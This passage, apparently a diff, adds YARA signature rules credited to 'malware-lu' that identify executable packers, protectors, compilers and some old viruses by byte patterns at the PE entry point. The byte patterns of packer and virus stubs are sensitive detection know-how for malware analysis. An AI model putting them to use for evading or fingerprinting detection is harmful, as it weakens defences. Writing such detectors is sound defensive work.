+		$a0 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 }
+	$a1 = { E8 BA 00 00 00 ?? 00 00 00 00 ?? ?? 00 00 10 40 00 ?? ?? ?? 00 ?? ?? ?? 00 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 5E 83 C6 64 AD 50 AD 50 83 EE 6C AD 50 AD 50 AD 50 AD 50 AD 50 E8 E7 07 00 00 AD 8B DE 8B F0 83 C3 44 AD 85 C0 74 32 8B F8 56 FF 13 8B E8 AC 84 C0 75 FB AC 84 C0 74 EA 4E AD A9 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1
+}
+	
+	
+rule VProtectorV10Evcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D E8 24 00 00 00 8B 44 24 04 8B 00 3D 04 00 00 80 75 08 8B 64 24 08 EB 04 58 EB 0C E9 64 8F 05 00 00 00 00 74 F3 75 F1 EB 24 64 FF 35 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01LCCWin32DLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 83 7D 0C 01 75 05 E8 17 90 90 90 FF 75 10 FF 75 0C FF 75 08 A1 ?? ?? ?? ?? E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CodeCryptv014b
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PellesC450DLLX86CRTLIB
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 53 56 57 8B 5D 0C 8B 75 10 85 DB 75 0D 83 3D ?? ?? ?? ?? 00 75 04 31 C0 EB 57 83 FB 01 74 05 83 FB 02 75 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EEXEVersion112
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B4 30 CD 21 3C 03 73 ?? BA 1F 00 0E 1F B4 09 CD 21 B8 FF 4C CD 21 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv120EngdulekxtMASM32TASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEDiminisherv01Teraphy
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74 50 E8 02 01 00 00 8B FD 8D 9D 9A 33 40 00 8B 1B 8D 87 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VBOX43MTEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 0B C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SEAAXE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC BC ?? ?? 0E 1F E8 ?? ?? 26 A1 ?? ?? 8B 1E ?? ?? 2B C3 8E C0 B1 ?? D3 E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UpackV010V011Dwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE ?? ?? ?? ?? AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 ?? F3 AB C1 E0 ?? B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C ?? 73 ?? B0 ?? 3C ?? 72 02 2C ?? 50 0F B6 5F FF C1 E3 ?? B3 ?? 8D 1C 5B 8D ?? ?? ?? ?? ?? ?? B0 ?? 67 E3 29 8B D7 2B 56 0C 8A 2A 33 D2 84 E9 0F 95 C6 52 FE C6 8A D0 8D 14 93 FF D5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakePCGuard403415FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 FC 55 50 E8 00 00 00 00 5D EB 01 E3 60 E8 03 00 00 00 D2 EB 0B 58 EB 01 48 40 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SimplePack111Method1bagieTMX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC }
+	$a1 = { 60 E8 00 00 00 00 5B 8D 5B FA BD 00 00 ?? ?? 8B 7D 3C 8D 74 3D 00 8D BE F8 00 00 00 0F B7 76 06 4E 8B 47 10 09 C0 74 55 0F B7 47 22 09 C0 74 4D 6A 04 68 00 10 00 00 FF 77 10 6A 00 FF 93 38 03 00 00 50 56 57 89 EE 03 77 0C 8B 4F 10 89 C7 89 C8 C1 E9 02 FC F3 A5 89 C1 83 E1 03 F3 A4 5F 5E 8B 04 24 89 EA 03 57 0C E8 3F 01 00 00 58 68 00 40 00 00 FF 77 10 50 FF 93 3C 03 00 00 83 C7 28 4E 75 9E BE ?? ?? ?? ?? 09 F6 0F 84 0C 01 00 00 01 EE 8B 4E 0C 09 C9 0F 84 FF 00 00 00 01 E9 89 CF 57 FF 93 30 03 00 00 09 C0 75 3D 6A 04 68 00 10 00 00 68 00 10 00 00 6A 00 FF 93 38 03 00 00 89 C6 8D 83 6F 02 00 00 57 50 56 FF 93 44 03 00 00 6A 10 6A 00 56 6A 00 FF 93 48 03 00 00 89 E5 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule MASM32
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A ?? 68 00 30 40 00 68 ?? 30 40 00 6A 00 E8 07 00 00 00 6A 00 E8 06 00 00 00 FF 25 08 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefenderv10v11
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule XtremeProtectorv106
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? 00 B9 75 ?? ?? 00 50 51 E8 05 00 00 00 E9 4A 01 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 8A 06 46 88 07 47 BB 02 00 00 00 02 D2 75 05 8A 16 46 12 D2 73 EA 02 D2 75 05 8A 16 46 12 D2 73 4F 33 C0 02 D2 75 05 8A 16 46 12 D2 0F 83 DF 00 00 00 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector1112vcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0B 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1111
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 E7 1C 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxEddie1530
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 5E 81 EE ?? ?? FC 2E ?? ?? ?? ?? 4D 5A ?? ?? FA 8B E6 81 C4 ?? ?? FB 3B ?? ?? ?? ?? ?? 2E ?? ?? ?? ?? 50 06 56 1E 33 C0 50 1F C4 ?? ?? ?? 2E ?? ?? ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBySV028DLLshoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 03 C2 FF E0 ?? ?? ?? ?? 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEncrypt10JunkCode
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C BE 00 10 40 00 8B FE B9 ?? ?? ?? ?? BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61 E9 ?? ?? ?? FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEPasswordv02SMTSMF
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 04 ?? ?? ?? 8B EC 5D C3 33 C0 5D 8B FD 81 ED 33 26 40 ?? 81 EF ?? ?? ?? ?? 83 EF 05 89 AD 88 27 40 ?? 8D 9D 07 29 40 ?? 8D B5 62 28 40 ?? 46 80 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EncryptPE22006710220061025WFS
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RCryptorv16Vaska
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 D0 68 ?? ?? ?? ?? FF D2 }
+	$a1 = { 33 D0 68 ?? ?? ?? ?? FF D2 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PEPaCKv10CCopyright1998byANAKiN
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 2D 3D FE 20 50 45 2D 50 41 43 4B 20 76 31 2E 30 20 2D FE 2D 20 28 43 29 20 43 6F 70 }
+
+condition:
+		$a0
+}
+	
+	
+rule YodasProtectorv1032Beta2AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 03 00 00 00 EB 01 ?? BB 55 00 00 00 E8 03 00 00 00 EB 01 ?? E8 8F 00 00 00 E8 03 00 00 00 EB 01 ?? E8 82 00 00 00 E8 03 00 00 00 EB 01 ?? E8 B8 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxMTEnonencrypted
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01FSG131Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 90 90 90 00 BF 90 90 90 00 BB 90 90 90 00 53 BB 90 90 90 00 B2 80 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv212AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }
+	$a1 = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Upack022023betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 }
+	$a1 = { 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 59 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
+	$a2 = { AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 ?? 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00 }
+
+condition:
+		$a0 or $a1 at pe.entry_point or $a2 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01CodeLockAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00 01 28 01 50 4B 47 05 4C 3F B4 04 4D 4C 47 4B E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100c1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 8C 1E ?? ?? 8B 1E ?? ?? 8C DA 81 C2 ?? ?? 3B DA 72 ?? 81 EB ?? ?? 83 EB ?? FA 8E D3 BC ?? ?? FB FD BE ?? ?? 8B FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakenSPack13emadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PKLITEv100c2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BA ?? ?? A1 ?? ?? 2D ?? ?? 8C CB 81 C3 ?? ?? 3B C3 77 ?? 05 ?? ?? 3B C3 77 ?? B4 09 BA ?? ?? CD 21 CD 20 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchyv017FGiesen
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC FF 4D 08 31 D2 8D 7D 30 BE }
+
+condition:
+		$a0
+}
+	
+	
+rule ACProtectv190gRiscosoftwareInc
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 0F 87 02 00 00 00 1B F8 E8 01 00 00 00 73 83 04 24 06 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPX293300LZMAMarkusOberhumerLaszloMolnarJohnReiser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium133720070623ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv2000AlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 70 05 00 00 EB 4C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov4000053SiliconRealmsToolworks
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 20 8B 4B 00 68 80 E4 48 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4B 00 33 D2 8A D4 89 15 A4 A1 4B 00 8B C8 81 E1 FF 00 00 00 89 0D A0 A1 4B 00 C1 E1 08 03 CA 89 0D 9C A1 4B 00 C1 E8 10 A3 98 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov160a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectUltraProtect10X20XRiSco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 6F 72 74 5F 45 6E 64 73 73 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Thinstall3035Jtit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 }
+	$a1 = { 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00 03 D2 75 08 8B 16 83 C6 04 F9 13 D2 C3 B9 08 00 00 00 E8 01 00 00 00 C3 33 C0 E8 E1 FF FF FF 13 C0 E2 F7 C3 33 C9 41 E8 D4 FF FF FF 13 C9 E8 CD FF FF FF 72 F2 C3 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule PENinjav10DzAkRAkerTNT
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 5B 2A 40 00 BF 35 12 00 00 E8 40 12 00 00 3D 22 83 A3 C6 0F 85 67 0F 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded19XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 ?? ?? ?? ?? 50 E8 87 FC FF FF 59 59 A1 ?? ?? ?? ?? 8B 40 10 03 05 ?? ?? ?? ?? 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv13045
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
+	$a1 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Obsidium1338ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPV073betaap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E 72 6C 70 00 00 00 00 00 50 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 E0 }
+
+condition:
+		$a0
+}
+	
+	
+rule yCv13byAshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC C0 00 00 00 53 56 57 8D BD 40 FF FF FF B9 30 00 00 00 B8 CC CC CC CC F3 AB 60 E8 00 00 00 00 5D 81 ED 84 52 41 00 B9 75 5E 41 00 81 E9 DE 52 41 00 8B D5 81 C2 DE 52 41 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0
+}
+	
+	
+rule PCPECalphapreview
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 51 52 56 57 55 E8 00 00 00 00 5D 8B CD 81 ED 33 30 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AlexProtectorv10Alex
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5D 81 ED 06 10 40 00 E8 24 00 00 00 EB 01 E9 8B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Shrinkv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 50 9C FC BE ?? ?? BF ?? ?? 57 B9 ?? ?? F3 A4 8B ?? ?? ?? BE ?? ?? BF ?? ?? F3 A4 C3 }
+
+condition:
